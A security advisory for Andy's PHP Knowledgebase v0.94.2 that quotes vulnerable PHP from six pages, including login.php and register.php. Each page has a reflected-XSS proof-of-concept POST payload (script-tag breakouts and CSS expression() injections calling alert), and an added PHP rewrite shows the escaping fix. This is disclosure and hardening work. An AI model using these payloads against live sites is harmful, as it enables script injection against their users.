Andy's PHP Knowledgebase v0.94.2
http://aphpkb.org/
forgot_password.php
PHP code:
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
<p>User Name:<br /> <input type="text" name="username" size="10" maxlength="20" value="<?php if (isset($_POST['username'])) echo $_POST['username']; ?>" /></p>
pXSS
http://localhost/aphpkb/forgot_password.php
post username=1>"><script%20%0a%0d>alert(121212)%3B</script>
-------------------------------------------------------------
keysearch.php
PHP code:
if($_REQUEST['keyword_list']){
$keyword_list = escdata($_REQUEST['keyword_list']);
} else {
$keyword_list = 'nothing';
}
...
// If it's not the first page, make a Previous button.
if ($current_page != 1) {
echo '<a href="keysearch.php?keyword_list=' . $keyword_list . '&s=' . ($start - $display) . '&np=' . $num_pages . '">Previous</a> ';
}
// Make all the numbered pages.
for ($i = 1; $i <= $num_pages; $i++) {
if ($i != $current_page) {
echo '<a href="keysearch.php?keyword_list=' . $keyword_list . '&s=' . (($display * ($i - 1))) . '&np=' . $num_pages . '">' . $i . '</a> ';
} else {
echo $i . ' ';
}
}
// If it's not the last page, make a Next button.
if ($current_page != $num_pages) {
echo '<a href="keysearch.php?keyword_list=' . $keyword_list . '&s=' . ($start + $display) . '&np=' . $num_pages . '">Next</a>';
}
pXSS
http://localhost/aphpkb/keysearch.php
post keyword_list=1<script>alert(121212)</script>
-------------------------------------------------------------
login.php
PHP code:
<p>User Name:<br /><input type="text" name="username" size="10" maxlength="20" value="<?php if (isset($_POST['username'])) echo $_POST['username']; ?>" /></p>
pXSS
http://localhost/aphpkb/login.php
post username=1>"><script%20%0a%0d>alert(121212)%3B</script>
-------------------------------------------------------------
q.php
PHP code:
$articledatae = escdata(xss_clean($_POST['article']) );
...
$articledata = stripslashes($articledatae);
echo '<p>Article Details</p>';
echo "<p>Question:<br />$articledata</p>";
pXSS
http://localhost/aphpkb/q.php
post article=1<div+style+STYLE="width:expression(alert( 121212))%3B">&aid=111&submit=Submit%20Question
-------------------------------------------------------------
register.php
PHP code:
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
<p>First Name:<br /> <input type="text" name="first_name" size="15" maxlength="15" value="<?php if (isset($_POST['first_name'])) echo $_POST['first_name']; ?>" /></p>
<p>Last Name:<br /> <input type="text" name="last_name" size="30" maxlength="30" value="<?php if (isset($_POST['last_name'])) echo $_POST['last_name']; ?>" /></p>
<p>Email Address:<br /> <input type="text" name="email" size="40" maxlength="40" value="<?php if (isset($_POST['email'])) echo $_POST['email']; ?>" /> </p>
<p>User Name:<br /> <input type="text" name="username" size="10" maxlength="20" value="<?php if (isset($_POST['username'])) echo $_POST['username']; ?>" /> <small>Use only letters, numbers, and the underscore. Must be between 4 and 20 characters long.</small></p>
pXSS
http://localhost/aphpkb/register.php
post first_name=1>"><script%20%0a%0d>alert(121212)%3B</script
post last_name=1>"><script%20%0a%0d>alert(121212)%3B</script>
post email=1>"><script%20%0a%0d>alert(121212)%3B</script>
post username=1>"><script%20%0a%0d>alert(121212)%3B</script>
-------------------------------------------------------------
saa.php
PHP code:
$articledatae = escdata(xss_clean($_POST['article']) );
...
$articledata = stripslashes($articledatae);
echo '<p>Article Details</p>';
if($titlee) { echo "<p>Title: $titlee</p>"; }
echo "<p>Article:<br />$articledata</p>";
pXSS
http://localhost/aphpkb/saa.php
post article=1<div+style="width:expression(alert(121212 ))%3B">
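The three output contexts above (reflected value= attributes, the keysearch pager href, and the article body) with escaping applied on output, as an added hardening example that is not aphpkb's own code; the helper names h(), pager_link(), text_input() and article_html() are assumptions, and the demo inputs are the advisory's own payloads.

```php
<?php
// Added hardened rewrite of the sinks listed in this advisory (not aphpkb's code).
// Escape for an HTML body or a double/single-quoted attribute: neutralises < > " ' &.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// keysearch.php pager: query values are URL-encoded first (http_build_query),
// then the whole URL is HTML-escaped because it lands inside an href attribute.
function pager_link(string $keyword_list, int $s, int $num_pages, string $label): string {
    $url = 'keysearch.php?' . http_build_query(
        ['keyword_list' => $keyword_list, 's' => $s, 'np' => $num_pages]
    );
    return '<a href="' . h($url) . '">' . h($label) . '</a>';
}

// forgot_password.php / login.php / register.php: the reflected value= attribute
// is escaped, so 1>"><script>...</script> can no longer close the attribute or tag.
function text_input(string $name, int $size, int $maxlength): string {
    $value = isset($_POST[$name]) ? h($_POST[$name]) : '';
    return sprintf(
        '<input type="text" name="%s" size="%d" maxlength="%d" value="%s" />',
        h($name), $size, $maxlength, $value
    );
}

// q.php / saa.php: escape on output instead of a keyword blacklist followed by
// stripslashes, so style="width:expression(...)" is displayed as text, not rendered.
// Store the raw value and let the database layer (prepared statements) handle quoting.
function article_html(string $article): string {
    return '<p>Question:<br />' . nl2br(h($article)) . '</p>';
}

// Demo with constructed input taken from the advisory's PoCs (no HTTP request needed).
$_POST['username'] = '1>"><script>alert(121212);</script>';
echo text_input('username', 10, 20), "\n";
echo pager_link('1<script>alert(121212)</script>', 0, 3, 'Previous'), "\n";
echo article_html('1<div style="width:expression(alert(121212));">'), "\n";
```

Run with `php` on the command line to see each payload come out as inert, escaped markup.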